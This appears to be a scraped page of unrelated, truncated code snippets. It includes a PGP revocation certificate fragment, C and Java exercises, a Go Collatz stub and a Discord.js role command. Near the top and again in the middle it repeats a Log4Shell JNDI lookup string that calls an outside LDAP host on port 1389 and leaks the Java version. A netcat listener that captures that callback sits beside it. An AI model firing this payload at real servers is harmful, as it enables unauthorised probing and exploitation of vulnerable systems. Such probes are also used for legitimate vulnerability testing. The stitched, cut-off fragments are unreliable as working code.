${jndi:ldap://host:1389/${java:version}}
echo -e '0\x0c\x02\x01\x01a\x07\x0a\x01\x00\x04\x00\x04\00' | nc -vv -l -p 1389 | xxd
-----BEGIN PGP PUBLIC KEY BLOCK----- | |
Comment: This is a revocation certificate | |
iQG2BCABCgAgFiEEY6ET8KoTlAiufrv67OUQBwXw+zcFAmL3+xMCHQIACgkQ7OUQ | |
BwXw+zeQgwv+Jn4qGE1qp241R8cO7/nEfsNruizBtralAnBrlvYVd8fpoee3K685 | |
49IONJB/pwYJiuRlEdvKv29W8arRPYwjAZQA36Mc/Ex0InPAB9oJUTBYTZ+JILon | |
6bRPF5s1KD3FsLigjzNYdRPlg0enSnr06WsVP+PtAphwxbnyOuE1TLdabN+HeHFS | |
n3A/HRzt+KyiEqQBfTA3wdHDy8mXcHIWMBUClHYuHz3cfAO2oN1Dj/AWF/BFaH6k | |
p/dBCaFcUJxEYLjfwUqXGn3gKEKZCU/bGukYOH+/qAGSPKYXr3IDO6AmUf6zDUg/ | |
vsgjy1Rp8ieSarWs/wpWw8RptIct1/GaypHDbQq1hsObpgZ91zJrDvgFK7XFn72B |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
typedef enum | |
{ | |
STACK_INT, | |
STACK_CHAR, | |
STACK_UINT64 | |
} DataType; |
#include <stdio.h> | |
int main() { | |
double long k = 1, | |
s = 0; | |
for (size_t i = 0; i < 1000000; i++) | |
{ | |
if (i % 2 == 0) |
import java.io.*; | |
public class fileing { | |
public static void main(String[] args) { | |
} | |
void copyFileBuffer(File src, File dest) throws IOException { | |
try (var in = new BufferedInputStream( | |
new FileInputStream(src)); |
package main | |
import ( | |
"fmt" | |
"time" | |
) | |
/* | |
Rules: | |
if the number is odd -> multiply by three and add 1 (one) |
${jndi:ldap://host:1389/${java:version}}
echo -e '0\x0c\x02\x01\x01a\x07\x0a\x01\x00\x04\x00\x04\00' | nc -vv -l -p 1389 | xxd
import java.util.*; | |
public class test { | |
static public void main(String args[]){ | |
int[] res = Filter(new int[]{6, 9, 2, 2, 9, 4, -3}, 9); | |
for (int i : res){ | |
System.out.println(i); | |
} | |
} |
const Discord = require("discord.js"); | |
const errors = require("../utils/errors.js"); | |
module.exports.run = async (bot, message, args) => { | |
//!addrole @andrew Dog Person | |
if (!message.member.hasPermission("MANAGE_ROLES")) return errors.noPerms(message, "MANAGE_ROLES"); | |
if (args[0] == "help") { | |
message.reply("Usage: !addrole <user> <role>"); | |
return; |